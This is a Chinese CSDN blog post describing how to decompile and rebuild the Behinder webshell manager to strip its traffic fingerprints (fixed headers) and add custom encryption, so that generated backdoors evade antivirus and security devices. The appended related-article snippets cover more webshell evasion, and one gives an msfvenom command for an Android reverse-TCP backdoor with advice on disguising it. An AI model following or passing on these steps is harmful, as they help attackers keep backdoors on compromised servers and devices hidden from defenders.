魔改冰蝎 —— 绕过检测,自动生成免杀后门

最新推荐文章于 2024-06-04 00:40:21 发布
最新推荐文章于 2024-06-04 00:40:21 发布
阅读量1.3k 收藏 11
点赞数 9
文章标签: 二开工具 免杀后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60870041/article/details/135978120
版权
本文探讨了为何需要对现有工具进行修改以避免被安全设备识别,介绍了冰蝎流量特征、固定的请求头和加密算法。通过反编译和自定义编码,作者展示了如何在JavaFX环境中进行魔改,以实现更复杂的加密方式和后门的免杀效果。
摘要由CSDN通过智能技术生成

为什么要魔改工具?

  • 生成的代码很容易被监测

  • 生成的后门很容易被杀软杀掉
    在这里插入图片描述
    在这里插入图片描述

了解冰蝎流量特征

开启http代理,数据经过BP抓包进行分析数据
在这里插入图片描述
冰蝎数据包分析:

1、三个请求头固定

  • Accept
  • Accept-Language
  • User-Agent(内部有十个,来回替换)

2、请求正文固定6种加密算法
在这里插入图片描述
所以,这些热门工具的数据包人尽皆知,安全设备也都会加以防范,那只能自己开发工具,或魔改现有工具来进行绕过安全设备的检测

魔改过程

准备环境

  1. 将冰蝎的jar包进行反编译,网址https://www.decompiler.com/ ,拖拽上去即可,等一段时间将反编译文件下载
    在这里插入图片描述

  2. 反编译的文件在idea工具中打开,使用1.8的JDK
    当在使用 JavaIDEA 运行一个包含 JavaFX 的 JAR 包时出现缺少 JavaFX 运行时组件的错误时,可能是因为 JavaIDEA 默认情况下不包含 JavaFX 运行时组件。 JavaFX 在较新的 Java 版本中已从 JDK 中分离出来,并成为一个独立的模块。所以这里使用1.8版本的JDK
    在这里插入图片描述

    添加依赖,将原冰蝎文件里的jar包导入

    在这里插入图片描述

    在这里插入图片描述
    在这里插入图片描述

    选择工具主导

    在这里插入图片描述

开始魔改

  1. 搜索关键字,定位需要更改的地方
    在这里插入图片描述

  2. 复制需要更改的文件到其他目录,不然无法编译(这里我复制到src目录下)
    在这里插入图片描述

    构建项目

    在这里插入图片描述

    构建工件

    在这里插入图片描述

    最后将原冰蝎目录下的data.db文件复制到src目录下

  3. 运行后发现成功更改
    修改前
    在这里插入图片描述
    修改后
    在这里插入图片描述

  4. 修改加密算法
    搜索算法文件位置
    在这里插入图片描述

    算法长这样

    [{"encode":"private byte[] Encrypt(byte[] data) throws Exception\n{\n    String key=\"e45e

    在这里插入图片描述

    可以直接在工具中添加,问GPT加解密后的代码即可

    在这里插入图片描述

    设置复杂加密方式,生成的后门即可做到免杀效果

config_星辰
关注
冰蝎Java WebShell免杀生成 -- ByPassBehinder4J​
lza20001103的博客
09-04 1181
冰蝎Java WebShell免杀生成 – ByPassBehinder4J​ 文章目录冰蝎Java WebShell免杀生成 -- ByPassBehinder4J​0x01 工具介绍0x02 安装与使用 项目地址:https://github.com/Tas9er/ByPassBehinder4J 0x01 工具介绍 冰蝎Java WebShell自动化免杀生成。 0x02 安装与使用 某天,接到一个任务,要求对某医院的信息系统做一次安全检测,看能否发现问题。 1、使用者无需关心免杀实现,只需要本地安装
红队攻防渗透技术实战流程:红队目标上线之免杀对抗-Webshell篇&改冰蝎&打乱特征指纹&新增加密协议&过后门查杀&过流量识别
HACKONE的博客
05-27 129
1、webshell工具里面的后门代码不被杀毒检测到-混淆。2、webshell工具里面的功能操作不被杀毒拦截到-。3、webshell工具里面的操作连接不被平台捕获到-。1、环境部署-JAR反编译&打包构建-项目即成功。2、改冰蝎-防识别-打乱特征指纹-使用即变异。3、改冰蝎-防查杀-新增加密协议-生成即免杀。解决1:绕过识别(打乱特征,新增加密算法)2、反编译打包环境-IDEA安装&反编译工具。新建-填入-保存-分享-导入项目-构建编译。改冰蝎-防识别-打乱特征指纹。
冰蝎shell_冰蝎——从入门到
weixin_39636707的博客
12-21 1418
原标题:冰蝎——从入门到什么是冰蝎?"冰蝎"是一个动态二进制加密网站管理客户端。在实战中,第一代webshell管理工具"菜刀"的流量特征非常明显,很容易就被安全设备检测到。基于流量加密的webshell变得越来越多,"冰蝎"在此应运而生。 "冰蝎"客户端基于JAVA,所以可以跨平台使用,最新版本为v2.0.1,兼容性较之前的版本有较大提升。主要功能为:基本信息、命令执行、虚拟终端、文件管理、...
免杀】-改冰蝎(入门)
最新发布
qq_55349490的博客
06-04 2119
Ps:本人一名网安小菜鸡,初学免杀技术。如果有什么不对的地方,希望各位大佬们能友好指正,也欢迎进行友好交流。不可能每次都取idea里面打开冰蝎,所以我们需要将构建后的jar保存出来方便后续使用。当我们修好自己想的后,便可以打包成jar包了。新建-填入-保存-分享-导入项目-构建编译。如果可以利用冰蝎的传输协议解密,那就实锤。冰蝎4的Accept有两个强特征,固定为。是原版冰蝎的根目录。:绕过识别(打乱指纹信息)为此,我们需要解决这两个问题。:绕过查杀(新增加密算法)是改冰蝎项目的根目录,
冰蝎4.0流量分析及
2301_77157449的博客
05-11 1174
冰蝎v4.0开放了传输协议的自定义功能,使得流量更为简单方便,本文以jsp脚本类型为例,提供一些冰蝎4流量的方式冰蝎4内置了如下几种传输协议,传输协议可以理解为流量的加密方式 以default_xor传输协议为例,这种传输协议是对原始数据进行了异或加密 效果如下: 我们来去掉加密解密函数的相关代码 如果不用任何加解密函数,request body其实传输的是java 字节码 响应体其实也是明文的固定格式的json类型 {"msg":"执行结果base64编码","status":"c3Vj
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
冰蝎4-从入门
zkaqlaoniao的博客
10-26 173
在每一次的渗透当中,都会遇见很多问题,比如一个工具需要java的一个低版本,另外一个又需要高版本,是可以在一个系统一个系统中存在多个java,但太麻烦,所以我就想在一个工具当中嵌入多个工具,套娃,然后增添一些功能方便各种操作,包括自定义成自己方便的类型,其次这是配合我上一篇文章可以结合使用的。
冰蝎各版本工具分析与思路
QIANDXX的博客
02-08 1956
冰蝎各版本工具分析与思路
冰蝎利用免杀webshell链接,反弹shell(附免杀webshell和工具
qq_41132792的博客
09-06 2217
我们这里需要的是java环境,版本的话最好就是安装Java最新的了,Windows也是可以使用的,我这里主要介绍的是Linux上使用,我是基于kali中使用的。我们因为是实验的关系,本地搭建一个网站就好了,Windows的选择phpstudy就好,Linux的百度一下安装下apache即可。然后会弹出我们的图形界面,这里我们就先停一下,将我们的木马传到/var/www/html这个文件夹中,这里我们可以自定义请求头,然后保存即可,保存完我们双击进去。首先我们启动冰蝎,这里我将它放到了我的工具包中,
通过DNS传输后门绕过杀软
02-25
在本篇文章里,我想解释怎么样不使用加密数据的方法也能绕过杀软,同时我也想在github上分享源代码。https://github.com/DamonMohammadbagher/NativePayload_DNS我想使用DNS协议来传输我的后门载荷,从攻击者的机器...
049-冰蝎,从入门到.pdf
09-20
049-冰蝎,从入门到.pdf
最新超级免杀的五次后门
04-13
五次后门大家都知道的啊!~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Behinder-Source:Shell经理Behinder的源代码。冰蝎源码,反编译,当前版本3.0 Beta6,支持内存马注入
03-23
关于 感谢原作者的技术分享和实践 ,当前反编译版本为Beta6 声明 本项目预测学习,请勿用于非法用途! 测试环境 Win10 + JDK1.8 + IDEA java内存马:tomcat7-9,websphere 12.2.1.3.0,wildfly17、21,websphere 20.0.0.12 Liberty 更新 解决连接weblogic时,返回包开头有两个换行,导致一系列问题 添加多种java环境下(tomcat,weblogic,wildfly,websphere),多种内存马(冰蝎,reGeorg)的支持 添加shell生成菜单 网站文件zip压缩功能(jsp,php,aspx) 启用修文件可行性功能(jsp,php,aspx) 添加.Net环境下aspx内存马的支持 添加壳引入导出功能 php下绕过open_basedir,代码直接用哥斯拉的 感谢
BIOS工具集.rar
08-16
BIOS工具完可以让100系、200系主板支持8代、9代CPU。b0步进的U刷完BIOS可以直接上,其他步进需要短接屏蔽。
强大的webshell管理工具——冰蝎
12-26
冰蝎:强大的WebShell管理工具】 在网络安全领域,WebShell是一种常见的攻击手段,它允许攻击者通过在目标服务器上部署后门程序来控制或监控网站。冰蝎(Behinder)是一款专为WebShell管理设计的强大工具,它以其...
权限控制WAF绕过之木马混淆免杀
m0_61506558的博客
10-03 751
当我们把有侵入性的代码写进去时,通过指纹信息,从而招到WAF的拦截,为了获取对方的控制权,通常会采取使用代码木马执行,使用shell工具连接,但是往往注入代码会被waf拦截,无法注入也就无法获取shell连接,就算绕过代码检测之后,执行的行为也可能被waf设备拦截,导致无法执行shell操作,下面从代码的注入绕过,与代码注入后执行操作绕过总方法,下面总结几种最新的绕过姿势。(一)变量覆盖我们就以为例,禁止使用简单的变量传递,大多数waf具有变量追踪,必需要引入变量覆盖传递参数。?
pbpost方法_冰蝎,从入门到(续)
weixin_39801879的博客
12-15 1054
这是酒仙桥六号部队的第 51篇文章。全文共计2086个字,预计阅读时长8分钟。0x01 前言本篇文章是《冰蝎,从入门到》的续篇。有小伙伴读过上一篇文章后联系笔者,说只介绍了 PHP 版本的特征擦除,希望可以获知其它语言版本的特征擦除思路和方法。本篇首先简单介绍一下上一篇文章中的通用流量特征点及擦除后的效果,再着重介绍在对"冰蝎"JSP 版和 ASP 版的中碰到的问题及流量监...
Windows免杀:服务后门
zcy5157912的博客
09-28 396
通过给自身传递不同的参数来达到不同的行为,用服务的自启动代替应用程序的自启动
冰蝎php马静态免杀
qq_61807674的博客
04-02 1283
其实还有小马哥的腾讯哈勃,但是那个不支持上传webshell,上传压缩包虽然行,但是如果压缩一遍了连冰蝎原马都查杀不出来,就当图一乐了,就不放出来了.....大部分云沙箱和在线查杀我都基本试过了,基本除了安恒云沙箱都能稳过(ah一生之敌),因为我的测试环境是php7.3往上了,没法用assert拼接执行,估计是检测到了eval执行字符串代码,所以静态检测没过,太丢脸就不放截图啦,师傅们可以按着自己的想法试试()但是也正常,只是做了基础的静态免杀而已,其实处理还是不够到位的,心态要端正,很不错了!
msfvenom生成安卓后门
09-10
msfvenom是Metasploit框架的一个工具,用于生成恶意软件,包括后门。在使用msfvenom生成安卓后门时,我们需要首先了解一些基本概念和步骤。 首先,我们需要安装和设置Metasploit框架。然后,我们可以使用msfvenom命令创建后门。该命令的基本语法如下: msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地主机IP地址> LPORT=<本地主机端口> -o <输出文件路径> 这里的LHOST标识我们的本地主机IP地址,LPORT标识本地主机的端口号,-o表示输出文件路径。我们可以根据自己的需要进行调整。 生成后,我们可以将后门APK文件传输到目标安卓设备上,然后通过欺骗用户或利用其他手段将后门应用程序执行。一旦应用程序被执行,它会与我们在msfvenom中设置的本地主机IP地址和端口进行通信。 我们还可以进一步优化生成的后门,例如: - 使用其他有效载荷,如android/meterpreter/reverse_http或android/meterpreter/reverse_https,以使用HTTP或HTTPS通信。 - 添加可执行权限,以确保安卓设备可以正确执行后门应用程序。 - 使用混淆技术来隐藏后门应用程序的真实目的,增加其对抗检测工具的能力。 总之,通过使用msfvenom工具,我们能够生成定制的安卓后门,用于安全测试和研究目的。然而,请注意在任何环境中合法和道德使用此类工具,并始终遵守法律和道德准则。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值